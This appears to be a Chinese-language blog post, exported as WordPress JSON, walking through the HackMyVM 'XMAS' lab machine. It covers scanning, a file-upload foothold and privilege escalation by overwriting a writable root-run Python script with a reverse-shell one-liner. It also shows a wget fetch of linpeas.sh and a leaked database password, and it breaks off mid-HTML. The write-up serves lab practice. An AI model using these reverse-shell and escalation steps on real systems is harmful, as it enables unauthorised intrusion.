{"id":487,"date":"2024-04-02T14:24:08","date_gmt":"2024-04-02T06:24:08","guid":{"rendered":"http:\/\/162.14.82.114\/?p=487"},"modified":"2024-04-02T14:24:08","modified_gmt":"2024-04-02T06:24:08","slug":"hmv-_-xmas","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/487\/04\/02\/2024\/","title":{"rendered":"hmv[-_-]XMAS"},"content":{"rendered":"<h1>XMAS<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404021423590.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404021423590.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240402125455811\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 10.0.2.18 -- -A<\/code><\/pre>\n<pre><code class=\"language-css\">Open 10.0.2.18:22\nOpen 10.0.2.18:80<\/code><\/pre>\n<pre><code class=\"language-css\">PORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 a6:3e:0b:65:85:2c:0c:5e:47:14:a9:dd:aa:d4:8c:60 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB6Iuk2lt0gUkwd20LjylnFLItynNaqS7OuMGenbc2LNuIbmX\/gZGLZtpZvdTiMtV\/TQL1bAVcepNp2wlKDcOjw=\n|   256 99:72:b5:6e:1a:9e:70:b3:24:e0:59:98:a4:f9:d1:25 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKoXAD4Qu41umJfR110GNdZPV8ldmZ8VSG0OhQyVO+Fw\n80\/tcp open  http    syn-ack Apache httpd 2.4.55\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-title: Did not follow redirect to http:\/\/christmas.hmv\n|_http-server-header: Apache\/2.4.55 (Ubuntu)\nService Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/10.0.2.18\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt<\/code><\/pre>\n<pre><code class=\"language-text\">Error: the server returns a status code that matches the provided options for non existing urls. http:\/\/10.0.2.18\/96892852-b184-4e22-8560-c544262528af =&gt; 301 (Length: 339). To continue please exclude the status code or the length<\/code><\/pre>\n<p>\u67e5\u770b\u4e00\u4e0b\u7f51\u9875\uff0c\u4f1a\u53d1\u751f\u8df3\u8f6c\uff1a<\/p>\n<pre><code class=\"language-apl\">http:\/\/christmas.hmv\/<\/code><\/pre>\n<p>\u52a0\u4e00\u4e2adns\uff1a<\/p>\n<pre><code class=\"language-bash\"># \/etc\/hosts\n10.0.2.18 christmas.hmv<\/code><\/pre>\n<p>\u518d\u626b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/christmas.hmv\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt<\/code><\/pre>\n<pre><code class=\"language-css\">\/images               (Status: 301) [Size: 315] [--&gt; http:\/\/christmas.hmv\/images\/]\n\/uploads              (Status: 301) [Size: 316] [--&gt; http:\/\/christmas.hmv\/uploads\/]\n\/php                  (Status: 301) [Size: 312] [--&gt; http:\/\/christmas.hmv\/php\/]\n\/css                  (Status: 301) [Size: 312] [--&gt; http:\/\/christmas.hmv\/css\/]\n\/js                   (Status: 301) [Size: 311] [--&gt; http:\/\/christmas.hmv\/js\/]\n\/javascript           (Status: 301) [Size: 319] [--&gt; http:\/\/christmas.hmv\/javascript\/]\n\/fonts                (Status: 301) [Size: 314] [--&gt; http:\/\/christmas.hmv\/fonts\/]\n\/server-status        (Status: 403) [Size: 278]<\/code><\/pre>\n<h3>\u6f0f\u6d1e\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nikto -h http:\/\/10.0.2.18<\/code><\/pre>\n<pre><code>- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          10.0.2.18\n+ Target Hostname:    10.0.2.18\n+ Target Port:        80\n+ Start Time:         2024-04-02 00:56:24 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.55 (Ubuntu)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ Root page \/ redirects to: http:\/\/christmas.hmv\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ \/modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&amp;op=modload&amp;name=Members_List&amp;file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS).\n+ 8102 requests: 0 error(s) and 3 item(s) reported on remote host\n+ End Time:           2024-04-02 00:56:36 (GMT-4) (12 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u6316\u6398<\/h2>\n<h3>\u67e5\u770b\u654f\u611f\u76ee\u5f55<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404021423591.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404021423591.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240402131016520\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u6709\u4e00\u4e2a\u53ef\u4ee5\u67e5\u770b\u4e0a\u4f20\u6587\u4ef6\u7684\u5730\u65b9\uff0c\u5bfb\u627e\u4e00\u4e0b\u6709\u65e0\u6587\u4ef6\u4e0a\u4f20\u7684\u5730\u65b9\uff1a<\/p>\n<p>\u627e\u5230\u4e00\u5904\u95ee\u7b54\u5730\u65b9\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404021423592.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404021423592.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240402131402278\" style=\"zoom:33%;\" \/><\/div><\/p>\n<pre><code class=\"language-text\">What was Josephs job? \nCarpenter\nHow many red nosed reindeers pull Santa&#039;s sleigh? \n1\nWhat country did Christmas Trees originate from?\nGermany\nHow does Santa Claus go back up the Chimney to continue his journey of delivering gifts?\nHe jumps up through the chimney\nIn the TV series Simpsons, what species is Santas little helper?\nDog<\/code><\/pre>\n<p>\u6253\u5b8c\u65e0\u4e8b\u53d1\u751f\u3002\u3002\u3002<\/p>\n<h3>\u6587\u4ef6\u4e0a\u4f20\u53cd\u5f39shell<\/h3>\n<p>\u627e\u5230\u4e00\u4e2a\u4e0a\u4f20\u70b9\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404021423594.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404021423594.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240402131921836\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404021423595.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404021423595.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240402132259893\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404021423596.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404021423596.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240402132325862\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>wtf?\u96be\u9053\u5f04\u9519\u4e86\uff1f\u518d\u6765\u4e00\u6b21\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404021423597.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404021423597.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240402132626059\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u83ab\u540d\u5176\u5999\u53c8\u6709\u4e86\uff0c\u8fde\u63a5\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404021423598.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404021423598.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240402132718794\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-python\">(remote) www-data@xmas:\/$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@xmas:\/$ pwd \n\/\n(remote) www-data@xmas:\/$ cd \/var\/www\/html\n(remote) www-data@xmas:\/var\/www\/html$ ls -la\ntotal 20\ndrwxr-xr-x 2 root root  4096 Nov 17 19:20 .\ndrwxr-xr-x 4 root root  4096 Nov 17 19:59 ..\n-rw-r--r-- 1 root root 10671 Nov 17 19:20 index.html\n(remote) www-data@xmas:\/var\/www\/html$ cd ..\/;ls -la\ntotal 16\ndrwxr-xr-x  4 root root 4096 Nov 17 19:59 .\ndrwxr-xr-x 14 root root 4096 Nov 17 19:20 ..\ndrwxr-xr-x  8 root root 4096 Nov 19 21:35 christmas.hmv\ndrwxr-xr-x  2 root root 4096 Nov 17 19:20 html\n(remote) www-data@xmas:\/var\/www$ cd christmas.hmv\/\n(remote) www-data@xmas:\/var\/www\/christmas.hmv$ ls -la\ntotal 60\ndrwxr-xr-x 8 root     root      4096 Nov 19 21:35 .\ndrwxr-xr-x 4 root     root      4096 Nov 17 19:59 ..\ndrwxr-xr-x 2 root     root      4096 Nov 17 20:22 css\ndrwxr-xr-x 2 root     root      4096 Nov 17 20:22 fonts\ndrwxr-xr-x 2 root     root      4096 Nov 19 16:22 images\n-rw-r--r-- 1 root     root     25482 Nov 19 21:26 index.php\ndrwxr-xr-x 2 root     root      4096 Nov 17 20:22 js\ndrwxr-xr-x 2 root     root      4096 Nov 17 20:22 php\ndrwxrwxrwx 2 www-data www-data  4096 Apr  2 05:28 uploads\n(remote) www-data@xmas:\/var\/www\/christmas.hmv$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:106::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-resolve:x:996:996:systemd Resolver:\/:\/usr\/sbin\/nologin\npollinate:x:101:1::\/var\/cache\/pollinate:\/bin\/false\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsyslog:x:103:109::\/nonexistent:\/usr\/sbin\/nologin\nuuidd:x:104:110::\/run\/uuidd:\/usr\/sbin\/nologin\ntcpdump:x:105:111::\/nonexistent:\/usr\/sbin\/nologin\ntss:x:106:112:TPM software stack,,,:\/var\/lib\/tpm:\/bin\/false\nlandscape:x:107:113::\/var\/lib\/landscape:\/usr\/sbin\/nologin\nfwupd-refresh:x:108:114:fwupd-refresh user,,,:\/run\/systemd:\/usr\/sbin\/nologin\nalabaster:x:1000:1000:Alabaster Snowball:\/home\/alabaster:\/bin\/bash\nlxd:x:999:100::\/var\/snap\/lxd\/common\/lxd:\/bin\/false\nmysql:x:109:116:MySQL Server,,,:\/nonexistent:\/bin\/false\nsanta:x:1001:1001:Santa Claus,,,:\/home\/santa:\/bin\/bash\nsugurplum:x:1002:1002:Sugurplum Mary,,,:\/home\/sugurplum:\/bin\/bash\nbushy:x:1003:1003:Bushy Evergreen,,,:\/home\/bushy:\/bin\/bash\npepper:x:1004:1004:Pepper Minstix,,,:\/home\/pepper:\/bin\/bash\nshinny:x:1005:1005:Shinny Upatree,,,:\/home\/shinny:\/bin\/bash\nwunorse:x:1006:1006:Wunorse Openslae,,,:\/home\/wunorse:\/bin\/bash\n(remote) www-data@xmas:\/var\/www\/christmas.hmv$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\n# You can also override PATH, but by default, newer versions inherit it from the environment\n#PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || { cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily; }\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || { cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly; }\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || { cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly; }\n#\n(remote) www-data@xmas:\/var\/www\/christmas.hmv$ cd \/script\nbash: cd: \/script: No such file or directory\n(remote) www-data@xmas:\/var\/www\/christmas.hmv$ cd \/scripts\nbash: cd: \/scripts: No such file or directory\n(remote) www-data@xmas:\/var\/www\/christmas.hmv$ cd \/etc;ls -la\ntotal 960\n......(\u591a\u4e14\u6ca1\u6709\u53d1\u73b0\u5565)\n(remote) www-data@xmas:\/etc$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/passwd\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/fusermount3\n\/usr\/bin\/mount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/chfn\n\/usr\/libexec\/polkit-agent-helper-1\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/snapd\/20290\/usr\/lib\/snapd\/snap-confine\n\/snap\/snapd\/21184\/usr\/lib\/snapd\/snap-confine\n\/snap\/core22\/1122\/usr\/bin\/chfn\n\/snap\/core22\/1122\/usr\/bin\/chsh\n\/snap\/core22\/1122\/usr\/bin\/gpasswd\n\/snap\/core22\/1122\/usr\/bin\/mount\n\/snap\/core22\/1122\/usr\/bin\/newgrp\n\/snap\/core22\/1122\/usr\/bin\/passwd\n\/snap\/core22\/1122\/usr\/bin\/su\n\/snap\/core22\/1122\/usr\/bin\/sudo\n\/snap\/core22\/1122\/usr\/bin\/umount\n\/snap\/core22\/1122\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core22\/1122\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/core22\/1122\/usr\/libexec\/polkit-agent-helper-1\n\/snap\/core22\/864\/usr\/bin\/chfn\n\/snap\/core22\/864\/usr\/bin\/chsh\n\/snap\/core22\/864\/usr\/bin\/gpasswd\n\/snap\/core22\/864\/usr\/bin\/mount\n\/snap\/core22\/864\/usr\/bin\/newgrp\n\/snap\/core22\/864\/usr\/bin\/passwd\n\/snap\/core22\/864\/usr\/bin\/su\n\/snap\/core22\/864\/usr\/bin\/sudo\n\/snap\/core22\/864\/usr\/bin\/umount\n\/snap\/core22\/864\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core22\/864\/usr\/lib\/openssh\/ssh-keysign\n(remote) www-data@xmas:\/etc$ echo $PATH\n\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin:\/snap\/bin\n(remote) www-data@xmas:\/etc$ cd \/opt\n(remote) www-data@xmas:\/opt$ ls -la\ntotal 12\ndrwxr-xr-x  3 root root 4096 Nov 20 18:39 .\ndrwxr-xr-x 20 root root 4096 Nov 17 17:25 ..\ndrwxr-xr-x  2 root root 4096 Nov 20 18:39 NiceOrNaughty\n(remote) www-data@xmas:\/opt$ cd NiceOrNaughty\/\n(remote) www-data@xmas:\/opt\/NiceOrNaughty$ ls -la\ntotal 12\ndrwxr-xr-x 2 root root 4096 Nov 20 18:39 .\ndrwxr-xr-x 3 root root 4096 Nov 20 18:39 ..\n-rwxrwxrw- 1 root root 2029 Nov 20 18:39 nice_or_naughty.py\n(remote) www-data@xmas:\/opt\/NiceOrNaughty$ cat nice_or_naughty.py \nimport mysql.connector\nimport random\nimport os\n\n# Check the wish lists directory\ndirectory = &quot;\/var\/www\/christmas.hmv\/uploads&quot;\n# Connect to the mysql database christmas\nmydb = mysql.connector.connect(\n    host=&quot;localhost&quot;,\n    user=&quot;root&quot;,\n    password=&quot;ChristmasMustGoOn!&quot;,\n    database=&quot;christmas&quot;\n)\n\n#Read the names of the wish list\ndef read_names(directory):\n    for filename in os.listdir(directory):\n        full_path = os.path.join(directory, filename)\n        if os.path.isfile(full_path):\n            name, ext = os.path.splitext(filename)\n            if any(char.isalnum() for char in name):\n                status = random.choice([&quot;nice&quot;, &quot;naughty&quot;])\n                #print(f&quot;{name} {status}&quot;)\n                insert_data(name, status)\n                os.remove(full_path)\n            else:\n                pass\n\n        elif os.path.isdir(full_path):\n            pass \n\n# Insert name into the database\ndef insert_data(name, status):\n    mycursor = mydb.cursor()\n    sql = &quot;INSERT INTO christmas (name, status) VALUES ( %s, %s)&quot;\n    val = (name, status)\n    mycursor.execute(sql, val)\n    mydb.commit()\n\n#Generate printable Nice and Naughty list\ndef generate_lists():\n    mycursor = mydb.cursor()\n\n    # SQL query to fetch all names and status\n    mycursor.execute(&quot;SELECT name, status FROM christmas&quot;)\n\n    # Separate the nice and naughty lists\n    nice_list = []\n    naughty_list = []\n\n    for (name, status) in mycursor:\n        if status == &quot;nice&quot;:\n            nice_list.append(name)\n        else:\n            naughty_list.append(name)\n\n    parent_directory = os.path.dirname(os.getcwd())\n    file_path = &quot;\/home\/alabaster\/nice_list.txt&quot;\n    # Save the nice and naughty lists to separate txt files\n    with open(file_path, &quot;w&quot;) as file:\n        for name in nice_list:\n            file.write(f&quot;{name}\\n&quot;)\n    file_path = &quot;\/home\/alabaster\/naughty_list.txt&quot;\n    with open(file_path, &quot;w&quot;) as file:\n        for name in naughty_list:\n            file.write(f&quot;{name}\\n&quot;)\n\nread_names(directory)\ngenerate_lists()<\/code><\/pre>\n<p>\u53ef\u4ee5\u770b\u5230<code>-rwxrwxrw- 1 root root 2029 Nov 20 18:39 nice_or_naughty.py<\/code>\uff0c\u662f\u53ef\u5199\u7684\uff0c\u5728\u91cc\u9762\u52a0\u5165\u4e00\u4e2a\u53cd\u5f39shell\uff0c\u6211\u4e00\u5f00\u59cb\u7528<code>hack_tools<\/code>\u7684\uff0c\u4f46\u662f\u6ca1\u6210\u529f\uff0c\u53c8\u6362\u4e86\u4e00\u4e2a\uff1a<\/p>\n<pre><code class=\"language-bash\">echo &#039;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.0.2.4&quot;,2345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(&quot;\/bin\/bash&quot;)&#039; &gt;\/opt\/NiceOrNaughty\/nice_or_naughty.py<\/code><\/pre>\n<p>\u73b0\u5728\u5c31\u5f97\u60f3\u529e\u6cd5\u6267\u884c\u8fd9\u4e2a\u811a\u672c\uff0c\u56e0\u4e3a\u662f\u6ca1\u6709\u5b9a\u65f6\u4efb\u52a1\u7684\uff0c\u6240\u4ee5\u53ef\u80fd\u5b58\u5728\u67d0\u4e9b\u7a0b\u5e8f\u8c03\u7528\u65b9\u9762\u7684\uff0c\u4e0a\u4f20\u4e00\u4e2a<code>linpea.sh<\/code>\uff1a<\/p>\n<pre><code class=\"language-bash\"># kali\npython3 -m http.server 8888\n# xmas\nwget http:\/\/10.0.2.4:8888\/linpeas.sh\nchmod +x linpeas.sh\n.\/linpeas.sh<\/code><\/pre>\n<p>\u521a\u51c6\u5907\u56de\u5934\u62ff\u7ec8\u7aef\u53bb\u63d0\u53d6\u4e00\u4e0b\u4fe1\u606f\uff0c\u7ed3\u679c\u53d1\u73b0shell\u5df2\u7ecf\u5f39\u56de\u6765\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404021423599.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404021423599.png\" 